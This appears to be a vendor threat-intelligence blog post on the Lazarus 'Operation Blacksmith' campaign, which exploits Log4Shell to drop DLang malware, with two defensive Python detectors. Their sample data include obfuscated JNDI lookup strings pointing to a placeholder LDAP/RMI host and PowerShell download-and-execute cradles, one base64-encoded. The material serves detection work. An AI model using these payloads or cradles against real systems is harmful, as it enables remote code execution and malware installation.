Operation Blacksmith Detection: Lazarus APT Uses a CVE-2021-44228 Exploit to Deploy New DLang-Based Malware Strains
Adversaries keep setting their sights on the notorious Log4j flaw tracked as CVE-2021-44228, aka Log4Shell, even two years after its disclosure. A new campaign dubbed “Operation Blacksmith” exploits Log4Shell to deploy new malware strains written in DLang, including previously unseen RATs. The North Korean APT Lazarus Group is believed to be behind the newly discovered Operation Blacksmith.
Detect Operation Blacksmith Activity Linked to Lazarus APT
North Korean nation-backed APT groups continue to pose threats to global organizations across multiple industry sectors. The nefarious Lazarus Group, recognized as a proficient and well-financed hacking collective that has been wreaking havoc since 2009, resurfaces in the latest Operation Blacksmith campaign. SOC Prime Platform equips defenders with curated detection algorithms to identify Lazarus intrusions from this campaign in a timely manner. Follow the link below to obtain Sigma rules mapped to MITRE ATT&CK®, enriched with relevant threat intel, and convertible to dozens of security analytics platforms.
Sigma rules to detect Operation Blacksmith campaign attributed to Lazarus APT
Also, security engineers can rely on detections to defend against attacks by Onyx Sleet aka Andariel APT, a North Korean state-sponsored sub-group operating under the Lazarus umbrella:
Sigma rules to detect attacks linked to Andariel APT
Sigma rules to detect attacks linked to Onyx Sleet
Click Explore Detections to reach the entire detection stack for attacks linked to Lazarus and tagged accordingly. Dive into extensive metadata, including ATT&CK and CTI links, for streamlined threat research. Alternatively, drill down to curated detections to proactively defend against Hidden Cobra or APT38 attacks filtered by the custom tags based on the related actor attribution.
Operation Blacksmith Analysis: Insights into the Exploitation of CVE-2021-44228 to Deploy New Telegram-Based Malware
The nation-backed hacking collective Lazarus (aka APT38, Dark Seoul, or Hidden Cobra) from North Korea continues to weaponize the two-year-old CVE-2021-44228, aka Log4Shell, to spread three novel malware strains developed in the DLang programming language. These newly identified families include two previously unknown RATs, NineRAT and DLRAT, accompanied by a malicious downloader dubbed BottomLoader. The campaign, discovered by Cisco Talos, has come to the spotlight under the name “Operation Blacksmith”, with the manufacturing, agriculture, and physical security sectors being the attackers' primary targets.
The attack chain starts with successful exploitation of CVE-2021-44228, which serves as the entry point to the targeted servers. After gaining initial access, Lazarus conducts preliminary reconnaissance and then deploys a custom implant on the compromised system. Next, Lazarus deploys HazyLoad, a proxy tool that gives the attackers direct access to the host and removes the need to re-exploit CVE-2021-44228. The hackers also create an extra user account on the system and grant it administrative privileges. After dumping credentials, Lazarus installs NineRAT on the affected systems. NineRAT uses the Telegram API for C2 communication and ships with a dropper that establishes persistence and launches the primary binaries. Routing C2 through Telegram is most likely intended to evade detection by hiding the traffic inside a legitimate service.
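Since the chain above begins with Log4Shell, the first place to hunt is the web server access logs of Java applications, and the catch is that attackers rarely send a plain ${jndi:...} string: they nest Log4j lookups such as ${lower:j}, ${::-j} or ${env:NOPE:-j} so that a naive substring match misses them. The following detection logic is an added example written for this article, not code from Talos or from SOC Prime's rule set. It resolves nested lookups innermost-first the way Log4j 2.x would for the handful of lookups used in obfuscation, URL-decodes each line first, and reports every JNDI target it finds. The log lines are constructed samples; the IP addresses, URLs and field layout are assumptions made for the demo.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Innermost Log4j lookup: ${...} whose body contains no further braces.
_LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def _evaluate(body: str, hits: List[str]) -> str:
    """Resolve one innermost lookup body approximately as Log4j 2.x would,
    for the lookups attackers use to obfuscate the string 'jndi'."""
    if body.lower().startswith("jndi:"):
        # Never resolve JNDI; record the target and substitute an inert marker.
        hits.append(body[5:])
        return "<JNDI>"
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        # ${key:-default}: a missing key (${::-j}, ${env:NOPE:-j}) yields the default.
        return body.split(":-", 1)[1]
    # Any other lookup: keep its text but drop the wrapper so the loop makes progress.
    return body


def normalize_log4j(value: str, max_rounds: int = 200) -> Tuple[str, List[str]]:
    """Collapse nested lookups innermost-first and collect JNDI targets."""
    hits: List[str] = []
    for _ in range(max_rounds):  # bounded so a crafted input cannot spin forever
        m = _LOOKUP.search(value)
        if m is None:
            break
        value = value[: m.start()] + _evaluate(m.group(1), hits) + value[m.end() :]
    return value, hits


def scan_log_lines(lines: List[str]) -> List[dict]:
    """Return one finding per JNDI lookup found in each (URL-decoded) log line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        _, hits = normalize_log4j(unquote(line))
        for target in hits:
            scheme = target.split(":", 1)[0].lower()
            findings.append({"line": number, "scheme": scheme, "target": target})
    return findings


# Constructed sample access-log lines (assumed format; not real campaign artifacts).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [08/Dec/2023:10:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain payload in the User-Agent
    '10.0.0.9 - - [08/Dec/2023:10:01:23 +0000] "GET /api HTTP/1.1" 200 17 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    # lower/upper lookups spell out "jndi" and "ldap"
    '10.0.0.9 - - [08/Dec/2023:10:01:24 +0000] "GET /api HTTP/1.1" 200 17 "-" '
    '"${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7:1389/a}"',
    # empty-key defaults (${::-x}) build the string letter by letter
    '10.0.0.9 - - [08/Dec/2023:10:01:25 +0000] "GET /api HTTP/1.1" 200 17 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/x}"',
    # env-lookup default, URL-encoded and placed in the request path
    '10.0.0.9 - - [08/Dec/2023:10:01:26 +0000] "GET '
    '/%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Adns%3A%2F%2F198.51.100.7%2Fx%7D HTTP/1.1" 404 0 "-" "curl/8.0"',
    # a lookup that is not JNDI: must not fire
    '10.0.0.5 - - [08/Dec/2023:10:01:27 +0000] "GET /?q=${date:YYYY} HTTP/1.1" 200 9 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: jndi via {f['scheme']} -> {f['target']}")
```

The normalizer covers the lookups seen in common obfuscation (lower, upper and the :-default form); any other lookup keeps its body text so the surrounding string is still searched. A hit here means an exploitation attempt, not a confirmed compromise; the real fix is upgrading Log4j to a fixed release (2.17.1 or later on the 2.x branch), and on hosts that were exposed, hunting for the later steps of the chain such as newly created admin accounts and outbound connections to api.telegram.org from server workloads.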
DLRAT, which does not rely on Telegram, lets Lazarus deploy additional payloads on compromised systems. On first execution on a device, DLRAT runs a predefined set of commands to collect basic system information, which it then sends to its C2 server.
The third piece of malware used in Operation Blacksmith, BottomLoader, is a DLang-based downloader that retrieves and runs payloads from a hardcoded URL via PowerShell and is also used for system reconnaissance. BottomLoader additionally lets Lazarus upload files from the infected system to the C2 server, adding operational flexibility.
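BottomLoader's download-and-execute step runs through PowerShell, so process creation telemetry (Sysmon Event ID 1 or Windows Event ID 4688 with command-line logging enabled) is where it shows up, and a recurring blind spot is that the interesting command line is hidden behind -EncodedCommand, which is base64 of UTF-16LE text. The following is an added example written for this article, not BottomLoader's code or a SOC Prime rule: it decodes any encoded command, then checks the effective script for a download cradle paired with execution or evasion flags. The command lines are constructed samples, and the URLs, file names and flags in them are assumptions for the demo.

```python
import base64
import re
from typing import Dict, List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_FLAG = re.compile(r"(?i)\s[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})")
_IS_PS = re.compile(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b")
_DOWNLOAD = re.compile(
    r"(?i)DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\birm\b|Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b"
)
_EXECUTE = re.compile(r"(?i)Invoke-Expression|\biex\b|Start-Process|\bsaps\b|Invoke-Item|\.Invoke\(")
_EVASION = re.compile(
    r"(?i)[-/](?:nop\b|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)"
)


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = _ENC_FLAG.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> Dict[str, object]:
    """Flag PowerShell that downloads content and executes it or hides the session."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline  # inspect what actually runs
    is_ps = bool(_IS_PS.search(cmdline))
    download = bool(_DOWNLOAD.search(script))
    execute = bool(_EXECUTE.search(script))
    evasion = bool(_EVASION.search(cmdline)) or decoded is not None
    return {
        "powershell": is_ps,
        "encoded": decoded is not None,
        "decoded_script": decoded,
        "download": download,
        "execute": execute,
        "evasion": evasion,
        "suspicious": is_ps and download and (execute or evasion),
    }


def scan_command_lines(lines: List[str]) -> List[Dict[str, object]]:
    return [classify(line) for line in lines]


# Constructed sample command lines (assumed values; not real campaign artifacts).
_STAGE2 = r"Invoke-WebRequest -Uri http://203.0.113.10/p.exe -OutFile $env:TEMP\p.exe; Start-Process $env:TEMP\p.exe"
SAMPLE_COMMAND_LINES = [
    # classic cradle: fetch a script over HTTP and pipe it into Invoke-Expression
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command '
    '"IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.10/stage2.ps1\')"',
    # the same intent, hidden behind -enc
    "powershell.exe -nop -w hidden -enc " + encode_command(_STAGE2),
    # benign admin use of PowerShell
    'powershell.exe -Command "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"',
    # not PowerShell at all
    "C:\\Windows\\System32\\cmd.exe /c dir C:\\Users",
]

if __name__ == "__main__":
    for line, verdict in zip(SAMPLE_COMMAND_LINES, scan_command_lines(SAMPLE_COMMAND_LINES)):
        print("SUSPICIOUS" if verdict["suspicious"] else "ok        ", line[:70])
```

Keyword matching on the decoded script is deliberately simple; in production the same logic sits behind a Sigma rule on process creation events, and the decoding step is the part that matters, since encoded commands defeat rules that only look at the raw command line. Pair it with the network side: a hardcoded URL means the first outbound request from the server to that host is itself a usable indicator once the URL is known.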
Talos researchers note that over the past 18 months Lazarus has shipped RATs built with less common technologies, including the Qt framework, PowerBasic and, most recently, DLang.
Notably, Talos also observes overlaps between this latest Lazarus campaign and the TTPs of the North Korean state-sponsored group Onyx Sleet (aka PLUTONIUM), also tracked as the Andariel APT group, which is commonly regarded as a sub-unit operating under the Lazarus umbrella.
Operation Blacksmith marks a notable shift in the Lazarus Group's TTPs and shows how the adversary's toolkit continues to evolve. Log in to SOC Prime Platform to gain access to 6,000+ pieces of content from the Threat Detection Marketplace repository and proactively detect existing and emerging APT attacks of any scale.